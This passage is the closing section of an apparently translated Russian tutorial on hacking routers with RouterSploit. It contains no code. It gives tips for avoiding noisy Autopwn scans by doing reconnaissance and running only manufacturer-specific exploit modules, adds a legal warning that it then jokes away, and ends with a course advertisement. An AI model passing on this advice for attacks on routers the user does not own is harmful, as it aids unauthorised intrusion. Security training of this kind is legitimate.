                  Это введение должно познакомить вас с запуском RouterSploit для взлома маршрутизатора. Теперь вы можете начать использовать другие модули и экспериментировать с различными видами эксплойтов. Хотя Autopwn — удобная функция, она пробует множество различных эксплойтов и поэтому очень шумно в сети. Предпочтительный вариант — просканировать вашу цель, провести некоторую разведку и запустить только соответствующие модули производителя целевого маршрутизатора.Хотя использование маршрутизаторов может быть модным, имейте в виду, что делать это на чужом маршрутизаторе без разрешения — преступление. Если только вы не ЦРУ.

                  Не пропустите: как использовать маршрутизаторы на телефоне Android без прав доступа

                  Вы можете задать мне вопросы здесь или @ sadmin2001 в Twitter или Instagram.

                  Хотите начать зарабатывать деньги хакером в белой шляпе? Начните свою хакерскую карьеру с помощью пакета обучения Premium Ethical Hacking Certification Bundle 2020 в новом магазине Null Byte и получите более 60 часов обучения от профессионалов в области кибербезопасности.

                  Купить сейчас (90% скидка)>

                  Обложка и скриншоты от SADMIN / Null Byte .

    Добавить комментарий

    Ваш адрес email не будет опубликован. Обязательные поля помечены *